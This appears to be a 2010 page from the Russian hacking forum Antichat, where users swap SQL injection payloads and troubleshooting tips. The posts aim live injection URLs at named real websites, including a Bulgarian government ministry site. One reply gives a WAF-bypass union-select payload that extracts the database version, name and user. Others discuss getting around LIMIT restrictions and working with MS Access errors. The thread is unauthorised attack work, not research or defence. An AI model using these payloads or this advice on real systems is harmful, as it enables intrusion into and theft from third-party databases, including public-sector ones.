HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11611  
Старый 17.02.2010, 20:59
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1
 
Ответить с цитированием

  #11612  
Старый 17.02.2010, 22:09
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами: 9428066

Репутация: 1668
По умолчанию

Цитата:
Сообщение от LokbatanLi  
a vot zdes ??

http://www.aspik.am/index.php?p=-5+union+select+1
WAF не дремлет...
Код:
http://www.aspik.am/index.php?p=-5+union+/*!select*/+concat_ws(0x3a,version(),database(),user())
 
Ответить с цитированием

  #11613  
Старый 17.02.2010, 22:30
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?

Последний раз редактировалось [Feldmarschall]; 17.02.2010 в 22:34..
 
Ответить с цитированием

  #11614  
Старый 17.02.2010, 23:18
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
что делать есле information_schema идет но выдает ошибку есле добовляю "limit+... иле group_concat?
есть способы обхода этой ошибки иле можно заменить limit както?
LIMIT можно:
Код:
WHERE field_name NOT IN (a, b, c ,d)
group_concat - хз...
 
Ответить с цитированием

  #11615  
Старый 17.02.2010, 23:31
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами: 9865044

Репутация: 205
По умолчанию

Пацаны, хелп, плиз )))
Код HTML:
http://www.site.com/script.asp?id=1'+or+1=@@version--
Выдает:
Код HTML:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=1' or 1=@@version--'. 

/script.asp, line 17
Что за нах**?
 
Ответить с цитированием

  #11616  
Старый 17.02.2010, 23:33
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Access не держит комментарии.
 
Ответить с цитированием

  #11617  
Старый 17.02.2010, 23:37
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами: 9865044

Репутация: 205
По умолчанию

Т.е. нифига не получится?
 
Ответить с цитированием

  #11618  
Старый 17.02.2010, 23:40
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Т.е екстрасенсы в отпуске
Я написал то, что вижу, исходя из того, что ты дал

Или иди статью читай, или линк давай
 
Ответить с цитированием

  #11619  
Старый 17.02.2010, 23:44
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами: 9865044

Репутация: 205
По умолчанию

Код HTML:
http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
Скромно, да? =))

P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.

Последний раз редактировалось ~EviL~; 17.02.2010 в 23:46..
 
Ответить с цитированием

  #11620  
Старый 18.02.2010, 01:56
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.